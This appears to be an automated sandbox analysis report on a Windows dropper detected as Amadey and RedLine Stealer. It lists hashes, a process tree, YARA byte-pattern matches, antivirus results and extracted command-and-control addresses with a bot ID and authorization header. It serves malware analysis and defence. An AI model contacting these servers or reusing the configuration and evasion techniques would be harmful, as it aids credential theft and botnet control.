Edit tour

Windows Analysis Report
SzznpUhIjo.exe

Overview

General Information

Sample Name:	SzznpUhIjo.exe
Original Sample Name:	f62fe8447c5e9b9ea5ac424543ad20b3.exe
Analysis ID:	829685
MD5:	f62fe8447c5e9b9ea5ac424543ad20b3
SHA1:	847f52f9fff9b080e44de6738b61141b289cd09c
SHA256:	d7f0a894956299f235cc735af3469746f223b3394abc85660e89872503e55982
Tags:	exeRedLineStealer
Infos:

Detection

Amadey, RedLine

Score:	93
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected Amadeys stealer DLL

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Detected unpacking (changes PE section rights)

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Disable Windows Defender real time protection (registry)

Machine Learning detection for sample

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Disable Windows Defender notifications (registry)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Contains long sleeps (>= 3 min)

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Binary contains a suspicious time stamp

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

SzznpUhIjo.exe (PID: 6092 cmdline: C:\Users\user\Desktop\SzznpUhIjo.exe MD5: F62FE8447C5E9B9EA5AC424543AD20B3)

kino5628.exe (PID: 6084 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe MD5: 51B7FE413501DC9DD84CF1FCBB4C4BA2)

kino6423.exe (PID: 6028 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe MD5: DB27DCB2B593E449358CEC94D3D257DA)

kino4801.exe (PID: 6116 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe MD5: 211103CF935C81941C9A7C527A99891E)

bus7600.exe (PID: 4084 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)

con1165.exe (PID: 5392 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe MD5: 3930494C030BFEF77C7C0624C1F6BAEB)

rundll32.exe (PID: 680 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 2432 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 1504 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 2460 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://asec.ahnlab.com/en/41450/ https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html https://blogs.blackberry.com/en/2020/01/threat-spotlight-amadey-bot https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: Amadey

{"C2 url": "31.41.244.200/games/category/index.php", "Version": "3.68"}

Threatname: RedLine

{"C2 url": "193.233.20.30:4125", "Bot Id": "relon", "Authorization Header": "17da69809725577b595e217ba006b869"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a434:$pat14: , CommandLine: 0x134a7:$v2_1: ListOfProcesses 0x13286:$v4_3: base64str 0x13dff:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12811:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000009.00000003.291817431.0000000004510000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000003.291817431.0000000004510000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000000.00000002.341685333.0000000006A30000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000009.00000002.316668372.0000000002E26000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1690:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.341440182.0000000006880000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.255438944.0000000006E80000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.con1165.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.con1165.exe.400000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.con1165.exe.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
9.2.con1165.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.con1165.exe.2da0e67.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.2.con1165.exe.2da0e67.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
1.3.kino5628.exe.4776220.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.kino5628.exe.4776220.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a434:$pat14: , CommandLine: 0x134a7:$v2_1: ListOfProcesses 0x13286:$v4_3: base64str 0x13dff:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12811:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
0.3.SzznpUhIjo.exe.6f54a20.1.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
1.3.kino5628.exe.4776220.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
1.3.kino5628.exe.4776220.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x18834:$pat14: , CommandLine: 0x118a7:$v2_1: ListOfProcesses 0x11686:$v4_3: base64str 0x121ff:$v4_4: stringKey 0xff63:$v4_5: BytesToStringConverted 0xf176:$v4_6: FromBase64 0x10498:$v4_8: procName 0x10c11:$v5_5: FileScanning 0x1016c:$v5_7: RecordHeaderField 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
9.3.con1165.exe.4510000.0.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
9.3.con1165.exe.4510000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 C4 88 44 24 2B 88 44 24 2F B0 3F 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.3.SzznpUhIjo.exe.6f54a20.1.raw.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 9 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SzznpUhIjo.exe	ReversingLabs: Detection: 43%
Source: SzznpUhIjo.exe	Virustotal: Detection: 49%			Perma Link

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	Avira: detection malicious, Label: HEUR/AGEN.1252166

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe	Virustotal: Detection: 79%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Virustotal: Detection: 65%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	Virustotal: Detection: 79%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dNT35s70.exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	ReversingLabs: Detection: 59%
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	ReversingLabs: Detection: 88%
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	ReversingLabs: Detection: 66%

Machine Learning detection for sample

Source: SzznpUhIjo.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dNT35s70.exe	Joe Sandbox ML: detected

Source: 00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.30:4125", "Bot Id": "relon", "Authorization Header": "17da69809725577b595e217ba006b869"}
Source: 0.3.SzznpUhIjo.exe.6f54a20.1.unpack	Malware Configuration Extractor: Amadey {"C2 url": "31.41.244.200/games/category/index.php", "Version": "3.68"}

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	0_2_00402F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	1_2_008E2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E52F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	2_2_00E52F1D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,	3_2_010D2F1D

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Unpacked PE file: 0.2.SzznpUhIjo.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Unpacked PE file: 9.2.con1165.exe.400000.0.unpack

Source: SzznpUhIjo.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\lar\megeheyubosed.pdb source: kino6423.exe, 00000002.00000003.257898884.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, dNT35s70.exe.2.dr
Source:	Binary string: wextract.pdb source: SzznpUhIjo.exe, SzznpUhIjo.exe, 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, SzznpUhIjo.exe, 00000000.00000003.255438944.0000000006E80000.00000004.00000020.00020000.00000000.sdmp, kino5628.exe, kino5628.exe, 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, kino5628.exe, 00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, kino6423.exe, kino6423.exe, 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, kino6423.exe, 00000002.00000003.257898884.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, kino4801.exe, kino4801.exe, 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, kino6423.exe.1.dr, kino5628.exe.0.dr, kino4801.exe.2.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: SzznpUhIjo.exe, 00000000.00000003.256081932.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, SzznpUhIjo.exe, 00000000.00000003.255438944.0000000006E80000.00000004.00000020.00020000.00000000.sdmp, ge280443.exe.0.dr
Source:	Binary string: Healer.pdb source: con1165.exe, 00000009.00000003.292100697.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317635484.0000000004620000.00000004.08000000.00040000.00000000.sdmp, con1165.exe, 00000009.00000002.318010465.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317671404.0000000004650000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317938178.0000000004950000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: SzznpUhIjo.exe, 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, SzznpUhIjo.exe, 00000000.00000003.255438944.0000000006E80000.00000004.00000020.00020000.00000000.sdmp, kino5628.exe, 00000001.00000002.335529120.00000000008E1000.00000020.00000001.01000000.00000004.sdmp, kino5628.exe, 00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, kino6423.exe, 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, kino6423.exe, 00000002.00000003.257898884.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, kino4801.exe, 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, kino6423.exe.1.dr, kino5628.exe.0.dr, kino4801.exe.2.dr
Source:	Binary string: PC:\lar\megeheyubosed.pdb source: kino6423.exe, 00000002.00000003.257898884.0000000000B39000.00000004.00000020.00020000.00000000.sdmp, dNT35s70.exe.2.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: kino4801.exe, 00000003.00000003.258987124.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp, bus7600.exe, 00000004.00000000.259206423.0000000000822000.00000002.00000001.01000000.00000007.sdmp, bus7600.exe.3.dr
Source:	Binary string: XAC:\zavexuji\kixufefaginuye\9-kotegusaw 37\rihipivolov.pdb source: kino4801.exe, 00000003.00000003.258987124.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000000.290825680.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, con1165.exe.3.dr
Source:	Binary string: _.pdb source: con1165.exe, 00000009.00000003.292100697.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317635484.0000000004620000.00000004.08000000.00040000.00000000.sdmp, con1165.exe, 00000009.00000002.318010465.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317671404.0000000004650000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000003.293865027.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.316698493.0000000002E98000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\zen\nuheweca.pdb source: SzznpUhIjo.exe
Source:	Binary string: Healer.pdbH5 source: con1165.exe, 00000009.00000003.292100697.0000000002E86000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317635484.0000000004620000.00000004.08000000.00040000.00000000.sdmp, con1165.exe, 00000009.00000002.318010465.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317671404.0000000004650000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000002.317938178.0000000004950000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\zavexuji\kixufefaginuye\9-kotegusaw 37\rihipivolov.pdb source: kino4801.exe, 00000003.00000003.258987124.0000000004AC6000.00000004.00000020.00020000.00000000.sdmp, con1165.exe, 00000009.00000000.290825680.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, con1165.exe.3.dr

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_00402390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00402390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_008E2390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E52390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	2_2_00E52390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_010D2390

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 31.41.244.200/games/category/index.php
Source: Malware configuration extractor	URLs: 193.233.20.30:4125

Source: kino5628.exe, 00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, en239906.exe.1.dr

String found in binary or memory: https://api.ip.sb/ip

Source: con1165.exe, 00000009.00000002.316630593.0000000002E0A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.con1165.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.con1165.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.con1165.exe.2da0e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.3.kino5628.exe.4776220.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.3.kino5628.exe.4776220.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.3.con1165.exe.4510000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000009.00000003.291817431.0000000004510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.341685333.0000000006A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
